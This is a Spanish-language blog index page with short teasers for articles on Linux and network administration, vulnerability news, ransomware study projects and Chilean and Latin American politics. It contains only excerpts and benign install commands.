    pfSense es el sistema operativo orientado a firewall (cortafuegos) más utilizado a nivel profesional, tanto en el ámbito doméstico con usuarios avanzados, como en pequeñas y medianas empresas para segmentar su red correctamente y disponer de cientos de servicios disponibles. pfSense está basado en el popular sistema operativo FreeBSD, pero... Lee más: Monitorización y administración de redes con pfSense
  • Historia secreta de la maquinaria militar de corrupción del Ejército de Chile22/02/2022
    Desde Augusto Pinochet en adelante, con excepción de Ricardo Izurieta, todos los comandantes en jefe del Ejército han sido requeridos o apuntados por los tribunales de justicia por causas relacionadas con torturas, homicidios, blanqueamiento de dinero, fraudes, etcétera, dando cuenta, por ende, al resto de la sociedad, que este cuerpo... Lee más: Historia secreta de la maquinaria militar de corrupción del Ejército de Chile
  • Gestionar, administrar y configurar servicios en GNU/Linux21/02/2022
    Systemd es un conjunto de demonios o daemons, herramientas, librerías y servicios diseñados para administrar y configurar de manera centralizada todos los servicios en sistemas operativos GNU/Linux. Systemd nos permite interactuar directamente con el núcleo o kernel del sistema operativo. SysV ha sido desplazado de GNU/Linux y sustituido por systemd.... Lee más: Gestionar, administrar y configurar servicios en GNU/Linux
  • La alegría nunca llegó y el miedo se disfraza de esperanza18/02/2022
    El pasado 19 de diciembre pasó a la historia y no por pocas razones. Aquella jornada el nuevo presidente electo, la joven ex figura de la burocracia estudiantil, Gabriel Boric, se impuso en el balotaje con una gran diferencia sobre su contrincante José Antonio Kast, un anticomunista y pinochetista recalcitrante... Lee más: La alegría nunca llegó y el miedo se disfraza de esperanza
  • RCE sin autenticación en H2 por JNDI17/02/2022
    Recientemente los investigadores de JFrog han alertado que la consola de H2, la popular base de datos Java SQL de código abierto que almacena datos directamente en memoria, es vulnerable a ejecución remota de código. ¿Cómo? Pues mediante carga remota de clases con JNDI, algo que se introdujo en la... Lee más: RCE sin autenticación en H2 por JNDI
  • Propuestas constitucionales para Chile en la era de la información21/01/2022
    A causa del estallido social iniciado el 18 de Octubre del año 2019, y combinado con un largo proceso político, social y cultural que ayudó a determinar las directrices para el futuro de Chile, se han generado múltiples cambios, revoluciones, proyectos, movimientos y nuevas ideas simultáneas que, entre otras cosas,... Lee más: Propuestas constitucionales para Chile en la era de la información
  • Autoritarismo, censura y libertad de expresión en Internet12/01/2022
    Diversos actores han señalado que El Salvador se dirige progresivamente a un escenario en el que la separación de poderes y la débil democracia desaparece a pasos agigantados. En febrero de 2020, cuando el presidente Nayib Bukele irrumpió con militares en el Salón Azul de la Asamblea Legislativa para presionar... Lee más: Autoritarismo, censura y libertad de expresión en Internet
  • Aspectos económicos y de Estado para entender la Nueva Constitución en Chile24/10/2021
    El tema Constitución está en la palestra de la discusión diaria, particularmente con la Convención Constitucional y la futura nueva Constitución. Los puntos de vista son diversos como también los temas a tratar. Cuestión importante son los aspectos económicos. Es imprescindible ver la importancia del Estado en esta temática. Si... Lee más: Aspectos económicos y de Estado para entender la Nueva Constitución en Chile
  • Lecciones Permanentes del Golpe de Estado en Chile24/10/2021
    El siguiente ensayo de Ralph Miliband, fue publicado en octubre de 1973, cuando aún humeaban los restos de La Modeda, y las fuerzas militares y civiles responsables del golpe estaban entregados a una criminal furia represiva. A pesar del tiempo transcurrido, y de afirmaciones con las que de puede discrepar,... Lee más: Lecciones Permanentes del Golpe de Estado en Chile
  • Practicando nuestros conocimientos con el ransomware Phirautee21/10/2021
    En los últimos años, el mundo del ransomware se ha vuelto un poco loco y las organizaciones de todo el mundo están siendo atacadas, lo que provoca daños e interrupciones. Como todos sabemos, el panorama de las amenazas está cambiando rápidamente y escuchamos frecuentemente el alboroto sobre la infección de... Lee más: Practicando nuestros conocimientos con el ransomware Phirautee
  • ¿Es la censura de contenidos una protección efectiva para la niñez y la adolescencia?21/10/2021
    La discusión en Colombia de un proyecto de ley para la protección de niños, niñas y adolescentes es otro capítulo de intentos desmedidos por proteger derechos amenazando internet. El proyecto de ley 600 de 2021 fue presentado por el Ministerio de Tecnologías de la Información y las Comunicaciones y aprobado... Lee más: ¿Es la censura de contenidos una protección efectiva para la niñez y la adolescencia?
  • Por las ausentes: una dedicatoria a todas las mujeres asesinadas por el estado fascista y neoliberal de Chile18/10/2021
    «Siempre se pide un minuto de silencio y yo hoy quiero pedir no un minuto, el tiempo que queramos para no estar en silencio, vamos a gritar porque ya hemos estado mucho tiempo en silencio… Quiero que gritemos por todas nuestras hermanas asesinadas, por todas nuestras hermanas desaparecidas, por todas... Lee más: Por las ausentes: una dedicatoria a todas las mujeres asesinadas por el estado fascista y neoliberal de Chile
  • Los orígenes de la corrupción18/10/2021
    Una referencia necesaria Corrupción es un sustantivo. Femenino. Es el acto de corromper. Corromper, por su parte, es descomponer las partes de un cuerpo, separarlas, a fin de conseguir la destrucción de su estructura primitiva. Por analogía, se aplica a otras disciplinas como lo son la política y las ciencias... Lee más: Los orígenes de la corrupción
  • Tejer sentidos para una tecnología co-responsable desde el feminismo y los territorios15/10/2021
    Sentirnos, preguntarnos, implicarnos, escucharnos, [re]conocernos, vincularnos. La experiencia de acercarse a procesos-otros, ¿nos abre mundos de posibilidades? Nuestros entornos han cambiado de forma muy veloz, incluso si antes de estos prolongados periodos de cuarentenas nuestra gestión del tiempo, los vínculos y afectos estaban fuertemente atravesados por procesos remotos. A la... Lee más: Tejer sentidos para una tecnología co-responsable desde el feminismo y los territorios
  • Informes de DD.HH. en dictadura: datos sin perspectiva de género15/10/2021
    El pasado 11 de septiembre se conmemoraron 48 años del Golpe de Estado que marcó el inicio de la dictadura cívico-militar en Chile. Este año, para recordar el momento más doloroso del Chile reciente, como Observatorio de Datos y Estadísticas de Género e Interseccionalidades de Chile (ODEGI) quisimos honrar las... Lee más: Informes de DD.HH. en dictadura: datos sin perspectiva de género
  • Investigando el funcionamiento de un Ransomware-as-a-Service con RaasNet12/10/2021
    RAASnet es un proyecto escrito en Python que se creó para demostrar lo fácil que es desarrollar ransomware y estudiar o analizar su funcionamiento. El script se encuentra disponible para Microsoft Windows, GNU/Linux y MacOS. En Microsoft Windows se recomienda compilar payload.py en formato EXE para hacerlo más portátil. Principales... Lee más: Investigando el funcionamiento de un Ransomware-as-a-Service con RaasNet
  • Informe de Carabineros de Chile en 2012 advirtió sobre los daños provocados por escopetas antidisturbios12/10/2021
    Un peritaje elaborado hace casi 9 años por el Departamento de Criminalística recomendó disparar a más de 30 metros del blanco y solo apuntando al tercio inferior del cuerpo de los manifestantes. Disparos a menor distancia, advirtió el informe, pueden ser letales –si impactan en el cuello– o provocar estallido ocular,... Lee más: Informe de Carabineros de Chile en 2012 advirtió sobre los daños provocados por escopetas antidisturbios
  • Evadiendo el seguimiento, rastreo, espionaje y vigilancia de Youtube con Freetube09/10/2021
    Usualmente cuando queremos mirar algo en Youtube suele preocuparnos el seguimiento y vigilancia que esta plataforma podría ejercer sobre nuestro navegador web y dirección IP inyectando todas las cookies y código Javascript que le sea posible. Para solucionar ese problema, entre muchas otras opciones, aparece Invidious, el cual es un... Lee más: Evadiendo el seguimiento, rastreo, espionaje y vigilancia de Youtube con Freetube
  • Estado de excepción y toque de queda generan negativos efectos de inseguridad urbana en la sociedad chilena09/10/2021
    Desde el inicio de la crisis sanitaria generada por el COVID-19, en Chile se impuso deliberadamente un estado de excepción con el fin de controlar el orden público. Éste ha posibilitado el cierre de fronteras y más de quinientos días de sostenido toque de queda. Se ha buscado limitar la... Lee más: Estado de excepción y toque de queda generan negativos efectos de inseguridad urbana en la sociedad chilena
  • Validación incorrecta de direcciones IP en formato octal en Python 3.8-3.10 permite ataques SSRF, RFI y LFI06/10/2021
    Una dirección IPv4 se puede expresar de varias formas, en decimal, entero, octal y hexadecimal, aunque el decimal es lo más común. Por ejemplo: 8.8.8.8 en octal es 0010.0010.0010.0010. Algo que sorprenderá a muchos… si ponemos en el navegador https://0127.0.0.1 realmente nos redireccionará a https://87.0.0.1/. Eso es porque las secciones... Lee más: Validación incorrecta de direcciones IP en formato octal en Python 3.8-3.10 permite ataques SSRF, RFI y LFI
  • Pandora Papers: Filtración expone un obscuro, corrupto y fraudulento sistema financiero en Chile y el mundo06/10/2021
    Paraísos fiscales, la riqueza oculta de líderes mundiales y billonarios quedan al descubierto en una filtración sin precedentes Millones de documentos filtrados, que dieron pie a la mayor colaboración periodística en la historia, revelan los secretos financieros de 35 jefes y exjefes de Estado, unos 330 funcionarios de más de... Lee más: Pandora Papers: Filtración expone un obscuro, corrupto y fraudulento sistema financiero en Chile y el mundo
  • Curso GNU/Linux de la UTN03/10/2021
    A partir del año 2010 la UTN-FRA (Universidad Tecnológica Nacional Facultad Regional de Avellaneda) comenzó a trabajar en la difusión de tecnologías basadas en software libre considerando que éstas tendrán un rol fundamental en los años venideros. Pero, ¿qué es, exactamente, el software libre? La definición mantenida por la Fundación... Lee más: Curso GNU/Linux de la UTN
  • Ciberataque expone información privada sobre la agrupación ultraconservadora y de extrema derecha Oath Keepers30/09/2021
    Una agrupación peligrosa, violenta y hostíl Oath Keepers es una agrupación norteamericana de categoría paramilitar, antigubernamental, fascista, ultraconservadora y de extrema derecha conocida por numerosas manifestaciones, actos de violencia armada y componerse de miembros activos y retirados del ejército, de la policía y múltiples instituciones gubernamentales o estatales así como... Lee más: Ciberataque expone información privada sobre la agrupación ultraconservadora y de extrema derecha Oath Keepers
  • Identificando, monitorizando y controlando conexiones, puertos, procesos y servicios con Netstat GNU/Linux26/09/2021
    Netstat es una herramienta que permite identificar las conexiones, puertos y servicios de red activos en la máquina en la que se ejecuta el comando. Por otro lado, también permite a su vez obtener estadísticas de numerosos protocolos (Ethernet, IPv4, TCP, UDP, ICMP e IPv6). De esta manera podemos detectar... Lee más: Identificando, monitorizando y controlando conexiones, puertos, procesos y servicios con Netstat GNU/Linux
  • El mito de los cuidados digitales23/09/2021
    Las decisiones tomadas entorno a la rutina digital a veces parecen más ligeras que las del mundo «AFK» o «Away From Keyboard», término que usa Peter Sunde Kolmisoppi, uno de los creadores de Pirate Bay porque considera que el «mundo real» es también el digital. Muchas veces se afrontan estas... Lee más: El mito de los cuidados digitales
  • Espacios comunes digitales y tangibles19/09/2021
    El espacio común (no necesariamente público) revela el carácter de su sociedad. De esto se hablaba hace poco en MediaLab en la exposición «Paisajes de (In)Seguridad» de Goretti Díaz Cristóbal y Cristina Martínez Aransay, una obra que trata de explicar algunos de los miedos e incomodidades que sufren las mujeres... Lee más: Espacios comunes digitales y tangibles
  • OpEpikFail: Anonymous hackea al servicio de alojamiento web derechista y supremacista neonazi conocido como Epik17/09/2021
    Un ciberataque a gran escala contra el registrador de dominios y empresa de alojamiento web Epik, orquestado a manos del colectivo de activistas Anonymous, ha puesto al descubierto un enorme caudal de información privada y datos confidenciales con nombres de usuario, contraseñas de cuentas de alojamiento, claves SSH y números... Lee más: OpEpikFail: Anonymous hackea al servicio de alojamiento web derechista y supremacista neonazi conocido como Epik
  • Sobre las redes digitales16/09/2021
    Cuando se habla del impacto de redes sociales se suele poner el foco en la cantidad de personas que participan activamente en éstas. Es un factor importante que sale siempre que se discute sobre el uso e impacto de redes privativas. Esta discusión aparece en muchos contextos pero generalmente cuando... Lee más: Sobre las redes digitales
  • Ingeniería social: ¿qué es y cómo protegernos?12/09/2021
    Una cadena es tan fuerte como su eslabón más débil. El eslabón más débil de la ciberseguridad es el usuario. De la amalgama elaborada a partir de estas dos citas, podemos inferir que, aunque tengamos la mejor infraestructura para defendernos de los ciberataques, un usuario con la guardia baja puede... Lee más: Ingeniería social: ¿qué es y cómo protegernos?
  • Plataforma de Microsoft Power Apps expone por error 38 millones de registros privados09/09/2021
    Upguard Research revela múltiples fugas de datos que exponen 38 millones de registros de datos a través de los portales de Microsoft Power Apps mal configurados para permitir el acceso público. Según la empresa, las filtraciones de datos afectaron a American Airlines, Microsoft, J.B. Hunt y los gobiernos de Indiana,... Lee más: Plataforma de Microsoft Power Apps expone por error 38 millones de registros privados
  • Vulnerabilidad crítica en QNX de Blackberry compromete seguridad en millones de automóviles09/09/2021
    Un fallo crítico llamado «BadAlloc» en QNX RTOS de BlackBerry pone en peligro a más de 200 millones de coches y equipamiento en hospitales, La vulnerabilidad registrada como CVE-2021-22156 tiene una puntuación de gravedad CVSS 9 sobre 10. La actitud de BlackBerry, que ha escondido el problema y hasta hace... Lee más: Vulnerabilidad crítica en QNX de Blackberry compromete seguridad en millones de automóviles
  • Gestionando y administrando ficheros en nuestra propia nube privada con httpsweet05/09/2021
    HTTPSweet es un servidor HTTP para descargar y subir archivos fácilmente que nos ofrece algunas opciones más interesantes. Instalación Desde paquetes de Python: $ pip3 install httpsweet Desde el repositorio: $ git clone https://gitlab.com/Zer1t0/httpsweet $ cd httpsweet/ $ python3 setup.py install Y lanzamos el servidor: $ httpsweet Serving HTTP on... Lee más: Gestionando y administrando ficheros en nuestra propia nube privada con httpsweet
  • Vulnerabilidad RCE en Windows involucra al servicio Windows Print Spooler05/09/2021
    Como ya muchos saben, Microsoft confirmó oficialmente que la vulnerabilidad CVE-2021-34527 de ejecución remota de código (RCE) aka «PrintNightmare» que afecta al servicio Windows Print Spooler es diferente del problema que la compañía abordó como parte de su actualización del Patch Tuesday, al tiempo que se advirtió que se estaba... Lee más: Vulnerabilidad RCE en Windows involucra al servicio Windows Print Spooler
  • Abusando de las capabilities para escalar privilegios en sistemas *nix (Unix/Linux)05/09/2021
    En sistemas *nix (Unix/Linux) un proceso ejecutándose con privilegios de superusuario o un ejecutable con el bit suid otorga muchas veces permisos demasiado altos durante la ejecución del programa. Es como un «todo o nada» y por lo tanto uno de los principales objetivos que posiblemente podría explotar un eventual... Lee más: Abusando de las capabilities para escalar privilegios en sistemas *nix (Unix/Linux)
  • Gigabyte sufre ciberataque por infección de ransomware23/08/2021
    La compañía tecnológica taiwanesa Gigabyte confirmó que sus sistemas fueron infectados por ransomware y los responsables del ataque amenazan con filtrar más de 112 GB de información confidencial si la compañía no acepta sus demandas. El fabricante taiwanés de placas base Gigabyte ha sido atacado por la banda de ransomware... Lee más: Gigabyte sufre ciberataque por infección de ransomware
  • Vulnerabilidad física en módulos TPM permite hackear portátil de empresa en una auditoría23/08/2021
    Los investigadores de seguridad de la consultora Dolos Group, contratados para auditar y comprobar la seguridad de la red de un cliente, recibieron un ordenador portátil Lenovo preconfigurado para usar los estándares de seguridad de la organización, incluyendo TPM. No recibieron usuarios ni contraseñas, detalles de configuración ni cualquier otra... Lee más: Vulnerabilidad física en módulos TPM permite hackear portátil de empresa en una auditoría
  • Peligrosa campaña de hacking se esparce abusando de grave vulnerabilidad en Router Livebox Fibra Arcadyan de Orange23/08/2021
    La vulnerabilidad CVE-2021-20090 que también afecta a los routers LiveBox de Orange de la marca Arcadyan, están siendo explotados activamente para hackear a millones de dispositivos IoT en todo el mundo. El error explotado activamente permite omitir la autenticación en millones de routers expuestos en internet. Por suerte y como... Lee más: Peligrosa campaña de hacking se esparce abusando de grave vulnerabilidad en Router Livebox Fibra Arcadyan de Orange
Funciona gracias a WordPress | Tema: micro, desarrollado por DevriX.